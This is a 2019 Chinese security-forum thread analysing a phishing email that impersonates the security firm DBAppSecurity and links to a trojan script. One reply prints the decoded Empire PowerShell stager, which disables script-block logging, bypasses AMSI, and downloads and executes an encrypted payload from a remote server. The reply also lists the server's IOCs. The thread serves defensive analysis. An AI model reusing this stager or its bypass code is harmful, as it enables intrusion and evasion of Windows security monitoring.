首页
社区
课程
招聘
[注意]收到一个木马邮件,发上来大家玩玩
发表于: 2019-11-5 10:33 4967

[注意]收到一个木马邮件,发上来大家玩玩

2019-11-5 10:33
4967
连续收到2封邮件,链接的木马文件是同一种,第一封冒充安恒公司发过来的(已反馈给安恒了)。

邮件1:



邮件2:


两个链接一样的文件。 木马链接(一个脚本程序): 735K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3c8T1j5i4m8H3M7$3g2U0N6i4u0@1K9i4W2Q4x3X3g2U0L8$3#2Q4x3V1k6H3k6h3c8A6P5g2)9J5c8X3g2J5M7X3!0J5i4K6u0W2K9s2c8S2i4@1g2r3i4@1u0o6i4K6R3^5i4@1f1$3i4@1t1#2i4K6S2r3i4@1f1^5i4@1p5%4i4K6R3^5i4@1f1#2i4K6V1&6i4@1p5^5i4@1f1$3i4K6R3&6i4K6V1K6i4@1f1#2i4@1u0o6i4K6R3H3i4@1f1^5i4@1q4r3i4@1t1%4i4@1f1^5i4@1t1H3i4@1p5^5i4@1f1$3i4K6R3#2i4K6S2q4i4@1g2r3i4@1u0o6i4K6R3&6



[培训]科锐逆向工程师培训第53期2025年7月8日开班!

最后于 2019-11-5 20:44 被kanxue编辑 ,原因:
收藏
免费 0
支持
分享
最新回复 (11)
雪    币: 6437
活跃值: (4519)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
先不说技术,这个中文看着像是机器翻译的。。。
2019-11-5 10:36
0
雪    币: 58782
活跃值: (21941)
能力值: (RANK:350 )
在线值:
发帖
回帖
粉丝
3
第一封邮件冒充安恒公司,下面还有一个安恒的logo。
安恒的官网是:f93K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6%4N6%4N6Q4x3X3g2V1j5X3q4H3M7s2y4W2j5%4g2J5K9i4c8&6i4K6u0W2j5$3!0E0i4K6u0W2j5$3&6Q4x3V1j5`.
2019-11-5 10:41
0
雪    币: 2553
活跃值: (3439)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
4
其实是中国人, 故意用机翻, 假冒自己是外国人
2019-11-5 11:45
0
雪    币: 17428
活跃值: (5064)
能力值: ( LV9,RANK:450 )
在线值:
发帖
回帖
粉丝
5
恶意代码是powershell payload,使用的是Empire项目生成的payload,解码后如下:
IF($PSVErSIoNTABLe.PSVerSion.MAJor -ge 3){$GPS=[rEf].AssEmBLY.GetTYPe('System.Management.Automation.Utils')."GetFiE`Ld"('cachedGroupPolicySettings','N'+'onPublic,Static').GETVaLUe($nulL);If($GPS['ScriptB'+'lockLogging']){$GPS['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$GPS['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}ElsE{[SCrIpTBLock]."GeTFIE`Ld"('signatures','N'+'onPublic,Static').SetVALuE($Null,(NEW-ObjecT COLlectionS.GEnEriC.HaShSEt[sTRInG]))}[REf].ASSeMBLy.GetTypE('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GetFIELD('amsiInitFailed','NonPublic,Static').SETVaLUE($nuLl,$TrUe)};};[SySTem.NEt.ServICePoinTMANAGer]::ExPecT100CONtinUe=0;$wC=NeW-ObjECT SySTEM.NeT.WEbCLiEnt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$wc.HEadERS.Add('User-Agent',$u);$wc.PROxY=[SyStEm.NeT.WeBREQuEST]::DefAultWeBPROXY;$wC.PRoxy.CReDenTiALS = [SySTEM.NEt.CredEntiAlCACHe]::DEfaultNEtWORKCrEdEnTialS;$Script:Proxy = $wc.Proxy;$K=[SYStem.TexT.ENCODInG]::ASCII.GeTByTES('.};Pw5=?crvu0~mikL#*&_%qOFHREj:|');$R={$D,$K=$ARGs;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.COuNt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxOr$S[($S[$I]+$S[$H])%256]}};$ser='http://www2.netstorehosting.com:80';$t='/login/process.php';$WC.HEAdERs.ADd("Cookie","session=szQQtljIH3ITKRUXhK+5KeXNHE8=");$DATa=$WC.DOwnlOAdDAtA($sER+$T);$iv=$data[0..3];$dAtA=$DATA[4..$DAtA.LEngtH];-join[CHaR[]](& $R $dATA ($IV+$K))|IEX
IOC 如下:
url        a19K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3c8T1j5i4m8H3M7$3g2U0N6i4u0@1K9i4W2Q4x3X3g2U0L8$3#2Q4x3V1k6H3k6h3c8A6P5g2)9J5c8X3g2J5M7X3!0J5i4K6u0W2K9s2c8S2        
sha256        93b1707cbe27f7f515c089b6896591df616ce8c37b9fbbe932337f9531e20d57        
sha1        f49d99a94c4c643270578106ef39f0f07f2696c8        
md5        584437bc8063b64fb65d2882a7ddbd89        
domain        www2.netstorehosting.com
ip        45.89.175.192        
2019-11-5 11:55
0
雪    币: 54
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
6

是冒充安恒的钓鱼链接,安恒是dbappsecu rity,链接中是dbappsecu rtiy

2019-11-5 12:21
0
雪    币: 162
活跃值: (119)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
7
钓鱼安全论坛管理 怎么想的
2019-11-5 13:44
0
雪    币: 2573
活跃值: (4323)
能力值: ( LV13,RANK:540 )
在线值:
发帖
回帖
粉丝
8

冒充安恒信息对看雪论坛的一次定向钓鱼攻击 33dK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6E0M7q4)9J5k6i4N6W2K9i4S2A6L8W2)9J5k6i4q4I4i4K6u0W2j5$3!0E0i4K6u0r3M7#2)9J5c8U0f1&6P5e0u0H3c8K6m8j5L8X3A6p5h3e0b7&6L8$3N6B7j5@1g2Q4y4h3k6E0b7b7`.`.

最后于 2019-11-5 14:49 被熊猫正正编辑 ,原因:
2019-11-5 14:48
0
雪    币: 26136
活跃值: (1409)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
9
我就“傻傻”地直接在Chrome上打开了链接,可惜标红拦截了。。哎,失望。。
2019-11-5 15:01
0
雪    币: 1408
活跃值: (68)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
10
熊猫正正 冒充安恒信息对看雪论坛的一次定向钓鱼攻击 c87K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6E0M7q4)9J5k6i4N6W2K9i4S2A6L8W2)9J5k6i4q4I4i4K6u0W2j5$3!0E0i4K6u0r3M7#2)9J5c8U0f1&6P5e0u0H3c8K6m8j5L8X3A6p5h3e0b7&6L8$3N6B7j5@1g2Q4y4h3k6E0b7b7`.`.
这波分析是真的快,
2019-11-5 15:02
0
雪    币: 107
活跃值: (2222)
能力值: ( LV6,RANK:80 )
在线值:
发帖
回帖
粉丝
11
坛主用的是Mac,对坛主进行apt攻击失败。
2019-11-5 19:47
0
雪    币: 286
活跃值: (28)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
12
Freebuf上发了这帖子出来..针对看雪的钓鱼..好像也没说出个所以然.23333
2019-11-6 09:55
0
游客
登录 | 注册 方可回帖
返回